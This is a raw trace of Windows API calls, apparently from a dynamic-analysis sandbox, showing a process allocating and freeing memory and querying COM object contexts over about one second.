	[0052.909] IUnknown:Release (This=0x35f420) returned 0x1
	[0052.909] ??2@YAPEAX_K@Z () returned 0x48fe90
	[0052.910] ??2@YAPEAX_K@Z () returned 0x31f940
	[0052.910] CoGetObjectContext (in: riid=0x7fee3286350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x24f038 | out: ppv=0x24f038*=0x35f420) returned 0x0
	[0052.910] IUnknown:Release (This=0x35f420) returned 0x1
	[0052.910] ??2@YAPEAX_K@Z () returned 0x31fa00
	[0052.910] ISystemDebugEventFire:IsActive (This=0x3775b0) returned 0x1
	[0052.910] CoGetObjectContext (in: riid=0x7fee3286350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x24efd8 | out: ppv=0x24efd8*=0x35f420) returned 0x0
	[0052.910] IUnknown:Release (This=0x35f420) returned 0x1
	[0052.911] malloc (_Size=0x2e48) returned 0x31a4f0
	[0052.911] GetCurrentThreadId () returned 0x8c0
	[0052.912] ??2@YAPEAX_K@Z () returned 0x31fae0
	[0052.912] ??2@YAPEAX_K@Z () returned 0x31fbc0
	[0052.912] malloc (_Size=0x208) returned 0x31fca0
	[0052.913] ??2@YAPEAX_K@Z () returned 0x31d750
	[0052.913] ??2@YAPEAX_K@Z () returned 0x31e0d0
	[0052.913] ??2@YAPEAX_K@Z () returned 0x31feb0
	[0052.913] ??2@YAPEAX_K@Z () returned 0x31ff30
	[0052.914] ??2@YAPEAX_K@Z () returned 0x31ea50
	[0052.914] malloc (_Size=0x20) returned 0x31ed40
	[0052.914] malloc (_Size=0x288) returned 0x31ed70
	[0052.914] realloc (_Block=0x0, _Size=0x140) returned 0x490810
	[0052.914] realloc (_Block=0x31ed40, _Size=0x40) returned 0x31f000
	[0052.914] realloc (_Block=0x490810, _Size=0x280) returned 0x490810
	[0052.914] malloc (_Size=0x508) returned 0x490aa0
	[0052.914] realloc (_Block=0x31f000, _Size=0x80) returned 0x490fb0
	[0052.914] realloc (_Block=0x490810, _Size=0x500) returned 0x491040
	[0052.914] malloc (_Size=0xa08) returned 0x491550
	[0052.914] realloc (_Block=0x490fb0, _Size=0x100) returned 0x490810
	[0052.915] realloc (_Block=0x491040, _Size=0xa00) returned 0x491f60
	[0052.915] malloc (_Size=0x1408) returned 0x44dfd0
	[0052.916] realloc (_Block=0x490810, _Size=0x200) returned 0x490810
	[0052.916] realloc (_Block=0x491f60, _Size=0x1400) returned 0x44f3e0
	[0052.916] ??2@YAPEAX_K@Z () returned 0x490fb0
	[0052.917] ??2@YAPEAX_K@Z () returned 0x490a20
	[0052.917] ??2@YAPEAX_K@Z () returned 0x491090
	[0052.917] malloc (_Size=0x80) returned 0x491140
	[0052.917] malloc (_Size=0x108) returned 0x317d80
	[0052.917] ??2@YAPEAX_K@Z () returned 0x4911d0
	[0052.917] malloc (_Size=0x18) returned 0x31ffb0
	[0052.918] ??2@YAPEAX_K@Z () returned 0x4912b0
	[0052.918] ??2@YAPEAX_K@Z () returned 0x491f60
	[0052.918] malloc (_Size=0x80) returned 0x491360
	[0052.918] malloc (_Size=0x108) returned 0x317e90
	[0052.919] ??2@YAPEAX_K@Z () returned 0x491480
	[0052.924] ??2@YAPEAX_K@Z () returned 0x492250
	[0052.925] ??2@YAPEAX_K@Z () returned 0x492330
	[0052.925] ??2@YAPEAX_K@Z () returned 0x4923b0
	[0052.925] malloc (_Size=0x80) returned 0x492460
	[0052.925] malloc (_Size=0x108) returned 0x3180b0
	[0052.925] ??2@YAPEAX_K@Z () returned 0x492700
	[0052.925] malloc (_Size=0x18) returned 0x491530
	[0052.926] ??2@YAPEAX_K@Z () returned 0x4927e0
	[0052.926] ??2@YAPEAX_K@Z () returned 0x492860
	[0052.926] malloc (_Size=0x80) returned 0x492910
	[0052.926] malloc (_Size=0x108) returned 0x3181c0
	[0052.926] ??2@YAPEAX_K@Z () returned 0x4929a0
	[0052.926] malloc (_Size=0x30) returned 0x31f000
	[0052.927] ??2@YAPEAX_K@Z () returned 0x492a80
	[0052.927] realloc (_Block=0x0, _Size=0xa0) returned 0x492b40
	[0052.927] ??2@YAPEAX_K@Z () returned 0x31ed40
	[0052.927] ??2@YAPEAX_K@Z () returned 0x492bf0
	[0052.927] realloc (_Block=0x0, _Size=0xc8) returned 0x492c20
	[0052.928] ??2@YAPEAX_K@Z () returned 0x492cf0
	[0052.928] malloc (_Size=0x1008) returned 0x4507f0
	[0052.928] ??2@YAPEAX_K@Z () returned 0x492d30
	[0052.928] ??2@YAPEAX_K@Z () returned 0x492bf0
	[0052.928] free (_Block=0x4507f0) 
	[0052.928] ??3@YAXPEAX@Z () returned 0x15720801
	[0052.928] free (_Block=0x31f040) 
	[0052.928] free (_Block=0x492d30) 
	[0052.928] free (_Block=0x451a10) 
	[0052.928] free (_Block=0x451800) 
	[0052.928] free (_Block=0x3182d0) 
	[0052.928] ??2@YAPEAX_K@Z () returned 0x492cf0
	[0052.929] ??2@YAPEAX_K@Z () returned 0x492d50
	[0052.929] ??2@YAPEAX_K@Z () returned 0x492c20
	[0052.929] ??2@YAPEAX_K@Z () returned 0x492e30
	[0052.929] malloc (_Size=0x18) returned 0x31f040
	[0052.929] ??2@YAPEAX_K@Z () returned 0x492f10
	[0052.929] malloc (_Size=0x80) returned 0x4507f0
	[0052.929] malloc (_Size=0x108) returned 0x3182d0
	[0052.930] ??2@YAPEAX_K@Z () returned 0x450880
	[0052.930] malloc (_Size=0x80) returned 0x450930
	[0052.930] malloc (_Size=0x108) returned 0x3183e0
	[0052.930] realloc (_Block=0x0, _Size=0xc8) returned 0x4509c0
	[0052.930] ??2@YAPEAX_K@Z () returned 0x492ca0
	[0052.930] malloc (_Size=0x1008) returned 0x450a90
	[0052.930] ??2@YAPEAX_K@Z () returned 0x451aa0
	[0052.931] ??2@YAPEAX_K@Z () returned 0x451df0
	[0052.931] free (_Block=0x450a90) 
	[0052.931] ??3@YAXPEAX@Z () returned 0x15720801
	[0052.931] free (_Block=0x451c50) 
	[0052.931] free (_Block=0x451aa0) 
	[0052.931] free (_Block=0x4522a0) 
	[0052.931] free (_Block=0x452090) 
	[0052.931] free (_Block=0x3184f0) 
	[0052.931] ??2@YAPEAX_K@Z () returned 0x450a90
	[0052.931] ??2@YAPEAX_K@Z () returned 0x450af0
	[0052.932] ??2@YAPEAX_K@Z () returned 0x450bd0
	[0052.932] malloc (_Size=0x30) returned 0x492ca0
	[0052.932] ??2@YAPEAX_K@Z () returned 0x450cb0
	[0052.932] malloc (_Size=0x18) returned 0x4509c0
	[0052.932] ??2@YAPEAX_K@Z () returned 0x4509e0
	[0052.932] malloc (_Size=0x80) returned 0x450d90
	[0052.932] malloc (_Size=0x108) returned 0x3184f0
	[0052.933] ??2@YAPEAX_K@Z () returned 0x450e20
	[0052.933] ??2@YAPEAX_K@Z () returned 0x450e90
	[0052.934] ??2@YAPEAX_K@Z () returned 0x450f10
	[0052.934] malloc (_Size=0x208) returned 0x450f90
	[0052.934] ??2@YAPEAX_K@Z () returned 0x4511a0
	[0052.934] ??2@YAPEAX_K@Z () returned 0x451220
	[0052.935] ??2@YAPEAX_K@Z () returned 0x4512e0
	[0052.935] ??2@YAPEAX_K@Z () returned 0x451420
	[0052.935] ??2@YAPEAX_K@Z () returned 0x451560
	[0052.935] ??2@YAPEAX_K@Z () returned 0x4515f0
	[0052.935] ??2@YAPEAX_K@Z () returned 0x451680
	[0052.936] malloc (_Size=0x80) returned 0x451730
	[0052.936] malloc (_Size=0x108) returned 0x318600
	[0052.936] ??2@YAPEAX_K@Z () returned 0x4517c0
	[0052.936] ??2@YAPEAX_K@Z () returned 0x451870
	[0052.936] malloc (_Size=0x80) returned 0x451920
	[0052.936] malloc (_Size=0x108) returned 0x318710
	[0052.937] realloc (_Block=0x0, _Size=0x64) returned 0x4519b0
	[0052.937] realloc (_Block=0x0, _Size=0x2ac) returned 0x452090
	[0052.937] ??2@YAPEAX_K@Z () returned 0x452090
	[0052.937] free (_Block=0x4519b0) 
	[0052.938] ??2@YAPEAX_K@Z () returned 0x4519b0
	[0052.938] ??2@YAPEAX_K@Z () returned 0x451a60
	[0052.939] ??2@YAPEAX_K@Z () returned 0x451b10
	[0052.939] ??2@YAPEAX_K@Z () returned 0x452550
	[0052.939] malloc (_Size=0x80) returned 0x451bc0
	[0052.939] malloc (_Size=0x108) returned 0x318820
	[0052.940] ??2@YAPEAX_K@Z () returned 0x454520
	[0052.940] ??2@YAPEAX_K@Z () returned 0x454550
	[0052.941] ??2@YAPEAX_K@Z () returned 0x454580
	[0052.941] ??2@YAPEAX_K@Z () returned 0x4545b0
	[0052.942] ??2@YAPEAX_K@Z () returned 0x4545e0
	[0052.942] ??2@YAPEAX_K@Z () returned 0x454610
	[0053.015] ??2@YAPEAX_K@Z () returned 0x455550
	[0053.016] ??2@YAPEAX_K@Z () returned 0x455580
	[0053.016] ??2@YAPEAX_K@Z () returned 0x4555b0
	[0053.017] ??2@YAPEAX_K@Z () returned 0x4555e0
	[0053.018] ??2@YAPEAX_K@Z () returned 0x455610
	[0053.019] ??2@YAPEAX_K@Z () returned 0x455640
	[0053.020] ??2@YAPEAX_K@Z () returned 0x455670
	[0053.020] ??2@YAPEAX_K@Z () returned 0x4556a0
	[0053.021] ??2@YAPEAX_K@Z () returned 0x4556d0
	[0053.022] ??2@YAPEAX_K@Z () returned 0x455700
	[0053.023] ??2@YAPEAX_K@Z () returned 0x455730
	[0053.024] ??2@YAPEAX_K@Z () returned 0x455790
	[0053.025] ??2@YAPEAX_K@Z () returned 0x4557c0
	[0053.026] ??2@YAPEAX_K@Z () returned 0x4557f0
	[0053.027] ??2@YAPEAX_K@Z () returned 0x455820
	[0053.028] ??2@YAPEAX_K@Z () returned 0x455850
	[0053.029] ??2@YAPEAX_K@Z () returned 0x455880
	[0053.030] ??2@YAPEAX_K@Z () returned 0x4558b0
	[0053.031] ??2@YAPEAX_K@Z () returned 0x4558e0
	[0053.031] ??2@YAPEAX_K@Z () returned 0x455910
	[0053.032] ??2@YAPEAX_K@Z () returned 0x455940
	[0053.033] ??2@YAPEAX_K@Z () returned 0x455970
	[0053.035] ??2@YAPEAX_K@Z () returned 0x4559a0
	[0053.036] ??2@YAPEAX_K@Z () returned 0x4559d0
	[0053.037] ??2@YAPEAX_K@Z () returned 0x455a00
	[0053.038] ??2@YAPEAX_K@Z () returned 0x455a30
	[0053.038] ??2@YAPEAX_K@Z () returned 0x455a60
	[0053.040] ??2@YAPEAX_K@Z () returned 0x455a90
	[0053.040] ??2@YAPEAX_K@Z () returned 0x455ac0
	[0053.041] ??2@YAPEAX_K@Z () returned 0x455af0
	[0053.041] ??2@YAPEAX_K@Z () returned 0x455f60
	[0053.043] ??2@YAPEAX_K@Z () returned 0x455b20
	[0053.043] ??2@YAPEAX_K@Z () returned 0x455b50
	[0053.044] ??2@YAPEAX_K@Z () returned 0x455b80
	[0053.052] ??2@YAPEAX_K@Z () returned 0x455bb0
	[0053.053] ??2@YAPEAX_K@Z () returned 0x455be0
	[0053.053] ??2@YAPEAX_K@Z () returned 0x455c10
	[0053.054] ??2@YAPEAX_K@Z () returned 0x455c40
	[0053.125] ??2@YAPEAX_K@Z () returned 0x455c70
	[0053.126] ??2@YAPEAX_K@Z () returned 0x455ca0
	[0053.127] ??2@YAPEAX_K@Z () returned 0x455cd0
	[0053.128] ??2@YAPEAX_K@Z () returned 0x455d00
	[0053.129] ??2@YAPEAX_K@Z () returned 0x455d30
	[0053.130] ??2@YAPEAX_K@Z () returned 0x455d60
	[0053.131] ??2@YAPEAX_K@Z () returned 0x455d90
	[0053.132] ??2@YAPEAX_K@Z () returned 0x455dc0
	[0053.133] ??2@YAPEAX_K@Z () returned 0x455df0
	[0053.134] ??2@YAPEAX_K@Z () returned 0x455e20
	[0053.135] ??2@YAPEAX_K@Z () returned 0x455e50
	[0053.137] ??2@YAPEAX_K@Z () returned 0x455e80
	[0053.196] ??2@YAPEAX_K@Z () returned 0x455eb0
	[0053.197] ??2@YAPEAX_K@Z () returned 0x455ee0
	[0053.198] ??2@YAPEAX_K@Z () returned 0x455f10
	[0053.199] ??2@YAPEAX_K@Z () returned 0x456910
	[0053.200] ??2@YAPEAX_K@Z () returned 0x456940
	[0053.201] ??2@YAPEAX_K@Z () returned 0x456970
	[0053.202] ??2@YAPEAX_K@Z () returned 0x4569a0
	[0053.203] ??2@YAPEAX_K@Z () returned 0x4569d0
	[0053.204] ??2@YAPEAX_K@Z () returned 0x456a00
	[0053.205] ??2@YAPEAX_K@Z () returned 0x456a30
	[0053.206] ??2@YAPEAX_K@Z () returned 0x456a60
	[0053.206] ??2@YAPEAX_K@Z () returned 0x4570e0
	[0053.208] ??2@YAPEAX_K@Z () returned 0x456a90
	[0053.208] ??2@YAPEAX_K@Z () returned 0x456ac0
	[0053.209] ??2@YAPEAX_K@Z () returned 0x456af0
	[0053.211] CoGetObjectContext (in: riid=0x7fee3286350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x247858 | out: ppv=0x247858*=0x35f420) returned 0x0
	[0053.213] ??3@YAXPEAX@Z () returned 0x15720801
	[0053.213] ??3@YAXPEAX@Z () returned 0x15720801
	[0053.213] ??3@YAXPEAX@Z () returned 0x15720801
	[0053.213] free (_Block=0x451c70) 
	[0053.213] ??3@YAXPEAX@Z () returned 0x15720801
	[0053.213] ??3@YAXPEAX@Z () returned 0x15720801
	[0053.213] ??3@YAXPEAX@Z () returned 0x15720801
	[0053.213] free (_Block=0x31f040) 
	[0053.213] free (_Block=0x450930) 
	[0053.213] free (_Block=0x3183e0) 
	[0053.213] ??3@YAXPEAX@Z () returned 0x15720801
	[0053.213] ??3@YAXPEAX@Z () returned 0x15720801
	[0053.213] ??3@YAXPEAX@Z () returned 0x15720801
	[0053.214] free (_Block=0x451e20) 
	[0053.214] ??3@YAXPEAX@Z () returned 0x15720801
	[0053.214] ??3@YAXPEAX@Z () returned 0x15720801
	[0053.214] ??3@YAXPEAX@Z () returned 0x15720801
	[0053.214] ??3@YAXPEAX@Z () returned 0x15720801
	[0053.214] free (_Block=0x31ffb0) 
	[0053.214] ??3@YAXPEAX@Z () returned 0x15720801
	[0053.214] free (_Block=0x491140) 
	[0053.214] free (_Block=0x317d80) 
	[0053.214] ??3@YAXPEAX@Z () returned 0x15720801
	[0053.214] ??3@YAXPEAX@Z () returned 0x15720801
	[0053.214] MulDiv (nNumber=111, nNumerator=100, nDenominator=512) returned 22
	[0053.214] IUnknown:Release (This=0x35f420) returned 0x1
	[0053.214] GetTickCount () returned 0x1e501
	[0053.215] ??2@YAPEAX_K@Z () returned 0x456b20
	[0053.224] ??2@YAPEAX_K@Z () returned 0x456b50
	[0053.225] ??2@YAPEAX_K@Z () returned 0x456b80
	[0053.559] ??2@YAPEAX_K@Z () returned 0x456bb0
	[0053.578] ??2@YAPEAX_K@Z () returned 0x456be0
	[0053.579] ??2@YAPEAX_K@Z () returned 0x456c10
	[0053.580] ??2@YAPEAX_K@Z () returned 0x456c40
	[0053.581] ??2@YAPEAX_K@Z () returned 0x456c70
	[0053.581] ??2@YAPEAX_K@Z () returned 0x456ca0
	[0053.583] ??2@YAPEAX_K@Z () returned 0x456cd0
	[0053.583] ??2@YAPEAX_K@Z () returned 0x456d00
	[0053.584] ??2@YAPEAX_K@Z () returned 0x456d30
	[0053.586] ??2@YAPEAX_K@Z () returned 0x456d60
	[0053.587] ??2@YAPEAX_K@Z () returned 0x456d90
	[0053.587] ??2@YAPEAX_K@Z () returned 0x456dc0
	[0053.589] ??2@YAPEAX_K@Z () returned 0x456df0
	[0053.589] ??2@YAPEAX_K@Z () returned 0x456e20
	[0053.590] ??2@YAPEAX_K@Z () returned 0x456e50
	[0053.591] ??2@YAPEAX_K@Z () returned 0x456e80
	[0053.592] ??2@YAPEAX_K@Z () returned 0x456eb0
	[0053.593] ??2@YAPEAX_K@Z () returned 0x456ee0
	[0053.594] ??2@YAPEAX_K@Z () returned 0x456f10
	[0053.595] ??2@YAPEAX_K@Z () returned 0x456f40
	[0053.596] ??2@YAPEAX_K@Z () returned 0x456f70
	[0053.598] ??2@YAPEAX_K@Z () returned 0x456fa0
	[0053.598] ??2@YAPEAX_K@Z () returned 0x456fd0
	[0053.599] ??2@YAPEAX_K@Z () returned 0x457000
	[0053.600] ??2@YAPEAX_K@Z () returned 0x457030
	[0053.600] ??2@YAPEAX_K@Z () returned 0x457060
	[0053.601] ??2@YAPEAX_K@Z () returned 0x457090
	[0053.601] ??2@YAPEAX_K@Z () returned 0x457a90
	[0053.602] ??2@YAPEAX_K@Z () returned 0x457ac0
	[0053.602] ??2@YAPEAX_K@Z () returned 0x457af0
	[0053.603] ??2@YAPEAX_K@Z () returned 0x457b20
	[0053.604] ??2@YAPEAX_K@Z () returned 0x457b50
	[0053.604] ??2@YAPEAX_K@Z () returned 0x457b80
	[0053.605] ??2@YAPEAX_K@Z () returned 0x457bb0
	[0053.606] ??2@YAPEAX_K@Z () returned 0x457be0
	[0053.606] ??2@YAPEAX_K@Z () returned 0x457c10
	[0053.607] ??2@YAPEAX_K@Z () returned 0x457c40
	[0053.607] ??2@YAPEAX_K@Z () returned 0x457c70
	[0053.607] ??2@YAPEAX_K@Z () returned 0x457ca0
	[0053.607] ??2@YAPEAX_K@Z () returned 0x457cd0
	[0053.607] ??2@YAPEAX_K@Z () returned 0x457d00
	[0053.608] ??2@YAPEAX_K@Z () returned 0x457d30
	[0053.608] ??2@YAPEAX_K@Z () returned 0x457d60
	[0053.608] ??2@YAPEAX_K@Z () returned 0x457d90
	[0053.608] ??2@YAPEAX_K@Z () returned 0x457dc0
	[0053.609] ??2@YAPEAX_K@Z () returned 0x457df0
	[0053.609] ??2@YAPEAX_K@Z () returned 0x457e20
	[0053.609] ??2@YAPEAX_K@Z () returned 0x457e50
	[0053.609] ??2@YAPEAX_K@Z () returned 0x457e80
	[0053.610] ??2@YAPEAX_K@Z () returned 0x457eb0
	[0053.610] ??2@YAPEAX_K@Z () returned 0x457ee0
	[0053.610] ??2@YAPEAX_K@Z () returned 0x457f10
	[0053.686] ??2@YAPEAX_K@Z () returned 0x457f40
	[0053.687] ??2@YAPEAX_K@Z () returned 0x457f70
	[0053.687] ??2@YAPEAX_K@Z () returned 0x457fa0
	[0053.687] ??2@YAPEAX_K@Z () returned 0x452600
	[0053.687] malloc (_Size=0x208) returned 0x491090
	[0053.688] ??2@YAPEAX_K@Z () returned 0x450e90
	[0053.688] ??2@YAPEAX_K@Z () returned 0x492bf0
	[0053.688] ??2@YAPEAX_K@Z () returned 0x450880
	[0053.689] ??2@YAPEAX_K@Z () returned 0x4526b0
	[0053.689] ??2@YAPEAX_K@Z () returned 0x452760
	[0053.689] malloc (_Size=0x80) returned 0x450910
	[0053.689] malloc (_Size=0x108) returned 0x317d80
	[0053.689] ??2@YAPEAX_K@Z () returned 0x452810
	[0053.689] malloc (_Size=0x80) returned 0x450a90
	[0053.689] malloc (_Size=0x108) returned 0x3183e0
	[0053.689] ??2@YAPEAX_K@Z () returned 0x458260
	[0053.690] ??2@YAPEAX_K@Z () returned 0x457fa0
	[0053.690] ??2@YAPEAX_K@Z () returned 0x4528c0
	[0053.690] ??2@YAPEAX_K@Z () returned 0x457fa0
	[0053.690] ??2@YAPEAX_K@Z () returned 0x457fd0
	[0053.691] ??2@YAPEAX_K@Z () returned 0x457fd0
	[0053.691] ??2@YAPEAX_K@Z () returned 0x458000
	[0053.691] ??2@YAPEAX_K@Z () returned 0x458030
	[0053.691] ??2@YAPEAX_K@Z () returned 0x458030
	[0053.692] ??2@YAPEAX_K@Z () returned 0x458060
	[0053.692] ??2@YAPEAX_K@Z () returned 0x458090
	[0053.692] ??2@YAPEAX_K@Z () returned 0x458090
	[0053.692] ??2@YAPEAX_K@Z () returned 0x4580c0
	[0053.693] ??2@YAPEAX_K@Z () returned 0x4580f0
	[0053.693] ??2@YAPEAX_K@Z () returned 0x4580f0
	[0053.693] ??2@YAPEAX_K@Z () returned 0x458120
	[0053.693] ??2@YAPEAX_K@Z () returned 0x458150
	[0053.694] ??2@YAPEAX_K@Z () returned 0x458150
	[0053.694] ??2@YAPEAX_K@Z () returned 0x458180
	[0053.694] ??2@YAPEAX_K@Z () returned 0x4581b0
	[0053.694] ??2@YAPEAX_K@Z () returned 0x4581b0
	[0053.695] ??2@YAPEAX_K@Z () returned 0x4581e0
	[0053.695] ??2@YAPEAX_K@Z () returned 0x458210
	[0053.695] ??2@YAPEAX_K@Z () returned 0x458210
	[0053.695] ??2@YAPEAX_K@Z () returned 0x458c10
	[0053.696] ??2@YAPEAX_K@Z () returned 0x458c40
	[0053.696] ??2@YAPEAX_K@Z () returned 0x458c40
	[0053.696] ??2@YAPEAX_K@Z () returned 0x458c70
	[0053.697] ??2@YAPEAX_K@Z () returned 0x458ca0
	[0053.697] ??2@YAPEAX_K@Z () returned 0x458ca0
	[0053.697] ??2@YAPEAX_K@Z () returned 0x458cd0
	[0053.697] ??2@YAPEAX_K@Z () returned 0x458d00
	[0053.698] ??2@YAPEAX_K@Z () returned 0x458d00
	[0053.698] ??2@YAPEAX_K@Z () returned 0x458d30
	[0053.698] ??2@YAPEAX_K@Z () returned 0x458d60
	[0053.698] ??2@YAPEAX_K@Z () returned 0x458d60
	[0053.699] ??2@YAPEAX_K@Z () returned 0x458d90
	[0053.699] ??2@YAPEAX_K@Z () returned 0x458dc0
	[0053.699] ??2@YAPEAX_K@Z () returned 0x458dc0
	[0053.699] ??2@YAPEAX_K@Z () returned 0x458df0
	[0053.700] ??2@YAPEAX_K@Z () returned 0x4593e0
	[0053.700] ??2@YAPEAX_K@Z () returned 0x458e20
	[0053.700] ??2@YAPEAX_K@Z () returned 0x458e20
	[0053.700] ??2@YAPEAX_K@Z () returned 0x458e50
	[0053.701] ??2@YAPEAX_K@Z () returned 0x458e80
	[0053.701] ??2@YAPEAX_K@Z () returned 0x458e80
	[0053.701] ??2@YAPEAX_K@Z () returned 0x458eb0
	[0053.701] ??2@YAPEAX_K@Z () returned 0x458ee0
	[0053.702] ??2@YAPEAX_K@Z () returned 0x458ee0
	[0053.702] ??2@YAPEAX_K@Z () returned 0x458f10
	[0053.702] ??2@YAPEAX_K@Z () returned 0x458f40
	[0053.702] ??2@YAPEAX_K@Z () returned 0x458f40
	[0053.703] ??2@YAPEAX_K@Z () returned 0x458f70
	[0053.703] ??2@YAPEAX_K@Z () returned 0x458fa0
	[0053.703] ??2@YAPEAX_K@Z () returned 0x458fa0
	[0053.703] ??2@YAPEAX_K@Z () returned 0x458fd0
	[0053.704] ??2@YAPEAX_K@Z () returned 0x459000
	[0053.704] ??2@YAPEAX_K@Z () returned 0x459000
	[0053.704] ??2@YAPEAX_K@Z () returned 0x459030
	[0053.704] ??2@YAPEAX_K@Z () returned 0x459060
	[0053.705] ??2@YAPEAX_K@Z () returned 0x459060
	[0053.705] ??2@YAPEAX_K@Z () returned 0x459090
	[0053.705] ??2@YAPEAX_K@Z () returned 0x4590c0
	[0053.705] ??2@YAPEAX_K@Z () returned 0x4590c0
	[0053.706] ??2@YAPEAX_K@Z () returned 0x4590f0
	[0053.706] ??2@YAPEAX_K@Z () returned 0x459120
	[0053.706] ??2@YAPEAX_K@Z () returned 0x459120
	[0053.707] ??2@YAPEAX_K@Z () returned 0x459150
	[0053.707] ??2@YAPEAX_K@Z () returned 0x459180
	[0053.707] ??2@YAPEAX_K@Z () returned 0x459180
	[0053.708] ??2@YAPEAX_K@Z () returned 0x4591b0
	[0053.708] ??2@YAPEAX_K@Z () returned 0x4591e0
	[0053.708] ??2@YAPEAX_K@Z () returned 0x4591e0
	[0053.708] ??2@YAPEAX_K@Z () returned 0x459210
	[0053.708] ??2@YAPEAX_K@Z () returned 0x459240
	[0053.709] ??2@YAPEAX_K@Z () returned 0x459240
	[0053.709] ??2@YAPEAX_K@Z () returned 0x459270
	[0053.709] ??2@YAPEAX_K@Z () returned 0x459d60
	[0053.710] ??2@YAPEAX_K@Z () returned 0x4592a0
	[0053.710] ??2@YAPEAX_K@Z () returned 0x4592a0
	[0053.710] ??2@YAPEAX_K@Z () returned 0x4592d0
	[0053.710] ??2@YAPEAX_K@Z () returned 0x459300
	[0053.711] ??2@YAPEAX_K@Z () returned 0x459300
	[0053.711] ??2@YAPEAX_K@Z () returned 0x459330
	[0053.711] ??2@YAPEAX_K@Z () returned 0x459360
	[0053.711] ??2@YAPEAX_K@Z () returned 0x459360
	[0053.712] ??2@YAPEAX_K@Z () returned 0x459390
	[0053.712] ??2@YAPEAX_K@Z () returned 0x45a710
	[0053.712] ??2@YAPEAX_K@Z () returned 0x45a710
	[0053.712] ??2@YAPEAX_K@Z () returned 0x45a740
	[0053.713] ??2@YAPEAX_K@Z () returned 0x45a770
	[0053.713] ??2@YAPEAX_K@Z () returned 0x45a770
	[0053.713] ??2@YAPEAX_K@Z () returned 0x45a7a0
	[0053.713] ??2@YAPEAX_K@Z () returned 0x45a7d0
	[0053.714] ??2@YAPEAX_K@Z () returned 0x45a7d0
	[0053.714] ??2@YAPEAX_K@Z () returned 0x45a800
	[0053.714] ??2@YAPEAX_K@Z () returned 0x45a830
	[0053.714] ??2@YAPEAX_K@Z () returned 0x45a830
	[0053.715] ??2@YAPEAX_K@Z () returned 0x45a860
	[0053.715] ??2@YAPEAX_K@Z () returned 0x45a890
	[0053.715] ??2@YAPEAX_K@Z () returned 0x45a890
	[0053.715] ??2@YAPEAX_K@Z () returned 0x45a8c0
	[0053.716] ??2@YAPEAX_K@Z () returned 0x45a8f0
	[0053.716] ??2@YAPEAX_K@Z () returned 0x45a8f0
	[0053.716] ??2@YAPEAX_K@Z () returned 0x45a920
	[0053.717] ??2@YAPEAX_K@Z () returned 0x45a950
	[0053.717] ??2@YAPEAX_K@Z () returned 0x45a950
	[0053.717] ??2@YAPEAX_K@Z () returned 0x45a980
	[0053.717] ??2@YAPEAX_K@Z () returned 0x45a9b0
	[0053.718] ??2@YAPEAX_K@Z () returned 0x45a9b0
	[0053.718] ??2@YAPEAX_K@Z () returned 0x45a9e0
	[0053.718] ??2@YAPEAX_K@Z () returned 0x45aa10
	[0053.718] ??2@YAPEAX_K@Z () returned 0x45aa10
	[0053.719] ??2@YAPEAX_K@Z () returned 0x45aa40
	[0053.719] ??2@YAPEAX_K@Z () returned 0x45aa70
	[0053.719] ??2@YAPEAX_K@Z () returned 0x45aa70
	[0053.719] ??2@YAPEAX_K@Z () returned 0x45aaa0
	[0053.720] ??2@YAPEAX_K@Z () returned 0x45aee0
	[0053.720] ??2@YAPEAX_K@Z () returned 0x45aad0
	[0053.720] ??2@YAPEAX_K@Z () returned 0x45aad0
	[0053.726] ??2@YAPEAX_K@Z () returned 0x45ab00
	[0053.726] ??2@YAPEAX_K@Z () returned 0x45ab30
	[0053.726] ??2@YAPEAX_K@Z () returned 0x45ab30
	[0053.727] ??2@YAPEAX_K@Z () returned 0x45ab60
	[0053.727] CoGetObjectContext (in: riid=0x7fee3286350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2495e8 | out: ppv=0x2495e8*=0x35f420) returned 0x0
	[0053.729] ??3@YAXPEAX@Z () returned 0x1
	[0053.729] ??3@YAXPEAX@Z () returned 0xb00500001
	[0053.729] ??3@YAXPEAX@Z () returned 0xc004d0001
	[0053.729] ??3@YAXPEAX@Z () returned 0xd004a0001
	[0053.729] ??3@YAXPEAX@Z () returned 0xe00470001
	[0053.729] ??3@YAXPEAX@Z () returned 0xf00440001
	[0053.729] ??3@YAXPEAX@Z () returned 0x1000410001
	[0053.729] ??3@YAXPEAX@Z () returned 0x11003e0001
	[0053.729] ??3@YAXPEAX@Z () returned 0x12003b0001
	[0053.729] ??3@YAXPEAX@Z () returned 0x1300380001
	[0053.729] ??3@YAXPEAX@Z () returned 0x1400350001
	[0053.729] ??3@YAXPEAX@Z () returned 0x1500320001
	[0053.730] ??3@YAXPEAX@Z () returned 0x16002f0001
	[0053.730] ??3@YAXPEAX@Z () returned 0x17002c0001
	[0053.730] ??3@YAXPEAX@Z () returned 0x1800290001
	[0053.730] ??3@YAXPEAX@Z () returned 0x1900260001
	[0053.730] ??3@YAXPEAX@Z () returned 0x1a00230001
	[0053.730] ??3@YAXPEAX@Z () returned 0x1b00200001
	[0053.730] ??3@YAXPEAX@Z () returned 0x1c001d0001
	[0053.730] ??3@YAXPEAX@Z () returned 0x1d001a0001
	[0053.730] ??3@YAXPEAX@Z () returned 0x1e00170001
	[0053.730] ??3@YAXPEAX@Z () returned 0x1f00140001
	[0053.730] ??3@YAXPEAX@Z () returned 0x2000110001
	[0053.730] ??3@YAXPEAX@Z () returned 0x21000e0001
	[0053.730] ??3@YAXPEAX@Z () returned 0x1
	[0053.730] ??3@YAXPEAX@Z () returned 0x200200001
	[0053.730] ??3@YAXPEAX@Z () returned 0x3001d0001
	[0053.731] ??3@YAXPEAX@Z () returned 0x22000b0001
	[0053.731] ??3@YAXPEAX@Z () returned 0x4001a0001
	[0053.731] ??3@YAXPEAX@Z () returned 0x500170001
	[0053.731] ??3@YAXPEAX@Z () returned 0x2300080001
	[0053.731] ??3@YAXPEAX@Z () returned 0x600140001
	[0053.731] ??3@YAXPEAX@Z () returned 0x700110001
